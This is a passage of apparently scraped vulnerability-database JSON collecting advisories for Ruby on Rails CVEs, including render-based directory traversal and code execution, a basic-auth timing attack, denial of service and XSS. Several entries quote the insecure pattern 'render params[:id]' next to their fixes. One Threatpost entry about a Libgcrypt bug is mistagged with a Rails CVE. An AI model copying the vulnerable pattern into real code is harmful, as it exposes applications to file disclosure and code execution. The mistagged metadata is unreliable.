"confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0751"], "modified": "2016-02-16T02:59:00", "id": "DEBIANCVE:CVE-2016-0751", "href": "https://security-tracker.debian.org/tracker/CVE-2016-0751", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-26T06:09:35", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T02:59:00", "type": "debiancve", "title": "CVE-2016-0752", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-02-16T02:59:00", "id": "DEBIANCVE:CVE-2016-0752", "href": 
"https://security-tracker.debian.org/tracker/CVE-2016-0752", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "attackerkb": [{"lastseen": "2023-03-22T23:12:12", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application\u2019s unrestricted use of the render method and providing a .. (dot dot) in a pathname. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-04-07T00:00:00", "type": "attackerkb", "title": "CVE-2016-2097", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2020-06-05T00:00:00", "id": "AKB:2DE37106-01B7-46BE-8BCC-B5F819F9225D", "href": "https://attackerkb.com/topics/97etM6Bw4W/cve-2016-2097", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-14T05:12:13", "description": "Directory traversal 
vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application\u2019s unrestricted use of the render method and providing a .. (dot dot) in a pathname.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T00:00:00", "type": "attackerkb", "title": "CVE-2016-0752", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2020-07-30T00:00:00", "id": "AKB:4EA397A4-8D97-487F-A877-0376D1F51826", "href": "https://attackerkb.com/topics/60MM1Ug8Pn/cve-2016-0752", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "rubygems": [{"lastseen": "2022-10-25T12:12:52", "description": "\nThere is a possible directory traversal and information leak vulnerability\nin Action View. This was meant to be fixed on CVE-2016-0752. However the 3.2\npatch was not covering all the scenarios. 
This vulnerability has been\nassigned the CVE identifier CVE-2016-2097.\n\nVersions Affected: 3.2.x, 4.0.x, 4.1.x\nNot affected: 4.2+\nFixed Versions: 3.2.22.2, 4.1.14.2\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller may be vulnerable to an information leak vulnerability.\n\nImpacted code will look something like this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nCarefully crafted requests can cause the above code to render files from\nunexpected places like outside the application's view directory, and can\npossibly escalate this to a remote code execution attack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches\nfor it. 
It is in git-am format and consist of a single changeset.\n\n* 3-2-render_data_leak_2.patch - Patch for 3.2 series\n* 4-1-render_data_leak_2.patch - Patch for 4.1 series\n\nCredits\n-------\nThanks to both Jyoti Singh and Tobias Kraze from makandra for reporting this\nand working with us in the patch!\n", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "rubygems", "title": "Possible Information Leak Vulnerability in Action View", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2016-2097", "CVE-2016-0752", "CVE-2016-2097"], "modified": "2016-02-29T00:00:00", "id": "RUBY:ACTIONVIEW-2016-2097", "href": "https://rubysec.com/advisories/2016-2097/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-25T12:12:52", "description": "\nThere is a possible directory traversal and information leak vulnerability\nin Action View. This was meant to be fixed on CVE-2016-0752. However the 3.2\npatch was not covering all the scenarios. This vulnerability has been\nassigned the CVE identifier CVE-2016-2097.\n\nVersions Affected: 3.2.x, 4.0.x, 4.1.x\nNot affected: 4.2+\nFixed Versions: 3.2.22.2, 4.1.14.2\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller may be vulnerable to an information leak vulnerability.\n\nImpacted code will look something like this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nCarefully crafted requests can cause the above code to render files from\nunexpected places like outside the application's view directory, and can\npossibly escalate this to a remote code execution attack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. 
Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches\nfor it. It is in git-am format and consist of a single changeset.\n\n* 3-2-render_data_leak_2.patch - Patch for 3.2 series\n* 4-1-render_data_leak_2.patch - Patch for 4.1 series\n\nCredits\n-------\nThanks to both Jyoti Singh and Tobias Kraze from makandra for reporting this\nand working with us in the patch!\n", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "rubygems", "title": "Possible Information Leak Vulnerability in Action View", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2016-2097", "CVE-2016-0752", "CVE-2016-2097"], "modified": "2016-02-29T00:00:00", "id": "RUBY:ACTIONPACK-2016-2097", "href": "https://rubysec.com/advisories/2016-2097/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-25T12:12:52", "description": "There is a timing attack vulnerability in the basic authentication support\nin Action Controller. 
This vulnerability has been assigned the CVE\nidentifier CVE-2015-7576.\n\nVersions Affected: All.\nNot affected: None.\nFixed Versions: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1\n\nImpact\n------\nDue to the way that Action Controller compares user names and passwords in\nbasic authentication authorization code, it is possible for an attacker to\nanalyze the time taken by a response and intuit the password.\n\nFor example, this string comparison:\n\n \"foo\" == \"bar\"\n\nis possibly faster than this comparison:\n\n \"foo\" == \"fo1\"\n\nAttackers can use this information to attempt to guess the username and\npassword used in the basic authentication system.\n\nYou can tell your application is vulnerable to this attack by looking for\n`http_basic_authenticate_with` method calls in your application.\n\nAll users running an affected release should either upgrade or use one of\nthe workarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nIf you can't upgrade, please use the following monkey patch in an initializer\nthat is loaded before your application:\n\n```\n$ cat config/initializers/basic_auth_fix.rb\nmodule ActiveSupport\n module SecurityUtils\n def secure_compare(a, b)\n return false unless a.bytesize == b.bytesize\n\n l = a.unpack \"C#{a.bytesize}\"\n\n res = 0\n b.each_byte { |byte| res |= byte ^ l.shift }\n res == 0\n end\n module_function :secure_compare\n\n def variable_size_secure_compare(a, b)\n secure_compare(::Digest::SHA256.hexdigest(a), ::Digest::SHA256.hexdigest(b))\n end\n module_function :variable_size_secure_compare\n end\nend\n\nmodule ActionController\n class Base\n def self.http_basic_authenticate_with(options = {})\n before_action(options.except(:name, :password, :realm)) do\n authenticate_or_request_with_http_basic(options[:realm] || \"Application\") do |name, password|\n # This comparison uses & so that it doesn't short circuit and\n # uses 
`variable_size_secure_compare` so that length information\n # isn't leaked.\n ActiveSupport::SecurityUtils.variable_size_secure_compare(name, options[:name]) &\n ActiveSupport::SecurityUtils.variable_size_secure_compare(password, options[:password])\n end\n end\n end\n end\nend\n```\n\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nthe two supported release series. They are in git-am format and consist of a\nsingle changeset.\n\n* 4-1-basic_auth.patch - Patch for 4.1 series\n* 4-2-basic_auth.patch - Patch for 4.2 series\n* 5-0-basic_auth.patch - Patch for 5.0 series\n\nPlease note that only the 4.1.x and 4.2.x series are supported at present. Users\nof earlier unsupported releases are advised to upgrade as soon as possible as we\ncannot guarantee the continued availability of security fixes for unsupported\nreleases.\n\nCredits\n-------\n\nThank you to Daniel Waterworth for reporting the problem and working with us to\nfix it.\n", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "rubygems", "title": "Timing attack vulnerability in basic authentication in Action Controller.", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2015-7576", "CVE-2015-7576"], "modified": "2016-01-25T00:00:00", "id": "RUBY:ACTIONPACK-2015-7576", "href": "https://rubysec.com/advisories/2015-7576/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-25T12:12:52", "description": "There is a possible remote code execution vulnerability in Action Pack.\nThis vulnerability has been assigned the CVE identifier CVE-2016-2098.\n\nVersions Affected: 3.2.x, 4.0.x, 4.1.x, 4.2.x\nNot affected: 5.0+\nFixed Versions: 3.2.22.2, 4.1.14.2, 4.2.5.2\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller or a view may be vulnerable to a code injection.\n\nImpacted code will look like this:\n\n```ruby\nclass TestController < ApplicationController\n def show\n render params[:id]\n 
end\nend\n```\n\nAn attacker could use the request parameters to coerce the above example\nto execute arbitrary ruby code.\n\nAll users running an affected release should either upgrade or use one of\nthe workarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided a\npatch for it. It is in git-am format and consist of a single changeset.\n\n* 3-2-secure_inline_with_params.patch - Patch for 3.2 series\n* 4-1-secure_inline_with_params.patch - Patch for 4.1 series\n* 4-2-secure_inline_with_params.patch - Patch for 4.2 series\n\nCredits\n-------\nThanks to both Tobias Kraze from makandra and joernchen of Phenoelit for\nreporting this!\n", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "rubygems", "title": "Possible remote code execution vulnerability in Action Pack", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2016-2098", "CVE-2016-2098"], "modified": "2016-02-29T00:00:00", "id": "RUBY:ACTIONPACK-2016-2098", "href": "https://rubysec.com/advisories/2016-2098/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-25T12:12:52", "description": "There is a possible object leak which can lead to a denial of service\nvulnerability in Action Pack. 
This vulnerability has been\nassigned the CVE identifier CVE-2016-0751.\n\nVersions Affected: All.\nNot affected: None.\nFixed Versions: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1\n\nImpact\n------\nA carefully crafted accept header can cause a global cache of mime types to\ngrow indefinitely which can lead to a possible denial of service attack in\nAction Pack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nThis attack can be mitigated by a proxy that only allows known mime types in\nthe Accept header.\n\nPlacing the following code in an initializer will also mitigate the issue:\n\n```ruby\nrequire 'action_dispatch/http/mime_type'\n\nMime.const_set :LOOKUP, Hash.new { |h,k|\n Mime::Type.new(k) unless k.blank?\n}\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nthe two supported release series. They are in git-am format and consist of a\nsingle changeset.\n\n* 5-0-mime_types_leak.patch - Patch for 5.0 series\n* 4-2-mime_types_leak.patch - Patch for 4.2 series\n* 4-1-mime_types_leak.patch - Patch for 4.1 series\n* 3-2-mime_types_leak.patch - Patch for 3.2 series\n\nPlease note that only the 4.1.x and 4.2.x series are supported at present. 
Users\nof earlier unsupported releases are advised to upgrade as soon as possible as we\ncannot guarantee the continued availability of security fixes for unsupported\nreleases.\n\nCredits\n-------\nAaron Patterson <3<3\n", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "rubygems", "title": "Possible Object Leak and Denial of Service attack in Action Pack", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2016-0751", "CVE-2016-0751"], "modified": "2016-01-25T00:00:00", "id": "RUBY:ACTIONPACK-2016-0751", "href": "https://rubysec.com/advisories/2016-0751/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-25T12:12:52", "description": "There is a possible directory traversal and information leak vulnerability in\nAction View. This vulnerability has been assigned the CVE identifier\nCVE-2016-0752.\n\nVersions Affected: All.\nNot affected: None.\nFixed Versions: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller may be vulnerable to an information leak vulnerability.\n\nImpacted code will look something like this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nCarefully crafted requests can cause the above code to render files from\nunexpected places like outside the application's view directory, and can\npossibly escalate this to a remote code execution attack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. 
Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nthe two supported release series. They are in git-am format and consist of a\nsingle changeset.\n\n* 3-2-render_data_leak.patch - Patch for 3.2 series\n* 4-1-render_data_leak.patch - Patch for 4.1 series\n* 4-2-render_data_leak.patch - Patch for 4.2 series\n* 5-0-render_data_leak.patch - Patch for 5.0 series\n\nPlease note that only the 4.1.x and 4.2.x series are supported at present. Users\nof earlier unsupported releases are advised to upgrade as soon as possible as we\ncannot guarantee the continued availability of security fixes for unsupported\nreleases.\n\nCredits\n-------\nThanks John Poulin for reporting this!\n", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "rubygems", "title": "Possible Information Leak Vulnerability in Action View", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2016-0752", "CVE-2016-0752"], "modified": "2016-01-25T00:00:00", "id": "RUBY:ACTIONVIEW-2016-0752", "href": "https://rubysec.com/advisories/2016-0752/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-25T12:12:52", "description": "There is a possible directory traversal and information leak vulnerability in\nAction View. 
This vulnerability has been assigned the CVE identifier\nCVE-2016-0752.\n\nVersions Affected: All.\nNot affected: None.\nFixed Versions: 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, 3.2.22.1\n\nImpact\n------\nApplications that pass unverified user input to the `render` method in a\ncontroller may be vulnerable to an information leak vulnerability.\n\nImpacted code will look something like this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nCarefully crafted requests can cause the above code to render files from\nunexpected places like outside the application's view directory, and can\npossibly escalate this to a remote code execution attack.\n\nAll users running an affected release should either upgrade or use one of the\nworkarounds immediately.\n\nReleases\n--------\nThe FIXED releases are available at the normal locations.\n\nWorkarounds\n-----------\nA workaround to this issue is to not pass arbitrary user input to the `render`\nmethod. Instead, verify that data before passing it to the `render` method.\n\nFor example, change this:\n\n```ruby\ndef index\n render params[:id]\nend\n```\n\nTo this:\n\n```ruby\ndef index\n render verify_template(params[:id])\nend\n\nprivate\ndef verify_template(name)\n # add verification logic particular to your application here\nend\n```\n\nPatches\n-------\nTo aid users who aren't able to upgrade immediately we have provided patches for\nthe two supported release series. They are in git-am format and consist of a\nsingle changeset.\n\n* 3-2-render_data_leak.patch - Patch for 3.2 series\n* 4-1-render_data_leak.patch - Patch for 4.1 series\n* 4-2-render_data_leak.patch - Patch for 4.2 series\n* 5-0-render_data_leak.patch - Patch for 5.0 series\n\nPlease note that only the 4.1.x and 4.2.x series are supported at present. 
Users\nof earlier unsupported releases are advised to upgrade as soon as possible as we\ncannot guarantee the continued availability of security fixes for unsupported\nreleases.\n\nCredits\n-------\nThanks John Poulin for reporting this!\n", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "rubygems", "title": "Possible Information Leak Vulnerability in Action View", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["2016-0752", "CVE-2016-0752"], "modified": "2016-01-25T00:00:00", "id": "RUBY:ACTIONPACK-2016-0752", "href": "https://rubysec.com/advisories/2016-0752/", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhatcve": [{"lastseen": "2021-11-09T01:51:33", "description": "It was discovered that Action View tag helpers did not escape quotes when using strings declared as HTML safe as attribute values. A remote attacker could use this flaw to conduct a cross-site scripting (XSS) attack.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-08-12T06:18:33", "type": "redhatcve", "title": "CVE-2016-6316", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2021-11-08T23:52:14", "id": 
"RH:CVE-2016-6316", "href": "https://access.redhat.com/security/cve/cve-2016-6316", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:54", "description": "New versions of Libgcrypt and Gnu Privacy Guard (GnuPG or GPG) released on Wednesday include security fixes for vulnerabilities discovered in the mixing functions of the Libgcrypt random number generator.\n\nThe flaws were privately disclosed by Felix D\u00f6rre and Vladimir Klebanov of Karlsruhe Institute of Technology in Germany, and according to an [advisory](<http://lists.gnu.org/archive/html/info-gnu/2016-08/msg00008.html>) from the GnuPG Project, the bug has been in all GnuPG and Libgcrypt versions since 1998.\n\n\u201cAn attacker who obtains 4640 bits from the RNG can trivially predict the next 160 bits of output,\u201d said Werner Koch, who wrote GPG in 1997.\n\nGPG is a free implementation of OpenPGP, and is used by applications to encrypt and digitally sign data and communication between parties. Libgcrypt is the crypto library used by GPG since version 2.x.\n\nKoch wrote yesterday that all versions on all platforms are affected by the vulnerability.\n\n\u201cA first analysis on the impact of this bug in GnuPG shows that existing RSA keys are not weakened. For DSA and Elgamal keys it is also unlikely that the private key can be predicted from other public information,\u201d Koch wrote in the advisory. \u201cThis needs more research and I would suggest not to overhasty revoke keys.\u201d\n\nA request for additional comment from Koch was not returned in time for publication.\n\nUsers are advised to either wait for a vendor patch, or for home-grown applications using GPG 2.0.x or 2.1.x, Libgcrypt should be updated. 
For earlier versions of GPG such as 1.4.x, users are urged to immediately update to GPG 1.4.21.\n\nKoch\u2019s financial struggles in keeping GPG afloat were in the news more than a year ago after a [profile](<https://www.propublica.org/article/the-worlds-email-encryption-software-relies-on-one-guy-who-is-going-broke>) in Pro Publica. At the time, the project was running out of money after a fund-raising effort raised $43,000, well short of the $137,000 Koch was hoping for. Koch wanted the money to boost his own salary and hire a developer.\n\nShortly after the Pro Publica article went live, donations poured in to GPG to the tune of [\u20ac120,000 from the Core Infrastructure Initiative and individual donors](<https://threatpost.com/security-tech-communities-rally-to-support-gnupg/110894/>).\n\n\u201cAs the main author of GnuPG, I like to thank everyone for supporting the project, be it small or large individual donations, helping users, providing corporate sponsorship, working on the software, and for all the encouraging words,\u201d Koch said at the time.\n", "cvss3": {}, "published": "2016-08-18T12:39:21", "type": "threatpost", "title": "GPG Patches 18-Year-Old Libgcrypt RNG Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2016-08-23T18:56:40", "id": "THREATPOST:82E1359D397101F2CCA1968657708DB7", "href": "https://threatpost.com/gpg-patches-18-year-old-libgcrypt-rng-bug/119984/", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "gitlab": [{"lastseen": "2022-06-09T23:06:28", "description": "There is a possible XSS vulnerability in Action View. 
Text declared as \"HTML safe\" will not have quotes escaped when used as attribute values in tag helpers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-09-07T00:00:00", "type": "gitlab", "title": "Possible XSS Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-09-07T00:00:00", "id": "GITLAB-4592157653D70634A228B2043D8242B2", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/gem%2Factionview%2FCVE-2016-6316.yml/raw", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-09T23:06:26", "description": "Applications that pass unverified user input to the `render` method in a controller may be vulnerable to an information leak vulnerability. 
Impacted code will look something like this: ``` def index; render params[:id]; end ``` Carefully crafted requests can cause the above code to render files from unexpected places like outside the application's view directory, and can possibly escalate this to a remote code execution attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-04-07T00:00:00", "type": "gitlab", "title": "Possible Information Leak Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2097"], "modified": "2016-04-07T00:00:00", "id": "GITLAB-5AFFD2F604C9B362DF159A3A4228C4BC", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/gem%2Factionview%2FCVE-2016-2097.yml/raw", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-09T23:06:24", "description": "Applications that pass unverified user input to the `render` method in a controller may be vulnerable to an information leak vulnerability. Carefully crafted requests can render files from unexpected places like outside the application's view directory, and can possibly escalate this to a remote code execution attack. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-15T00:00:00", "type": "gitlab", "title": "Possible Information Leak Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-02-15T00:00:00", "id": "GITLAB-9ADCD46F0341E983FC7C5F296E742944", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/gem%2Factionview%2FCVE-2016-0752.yml/raw", "cvss": {"score": 5.0, "vector": 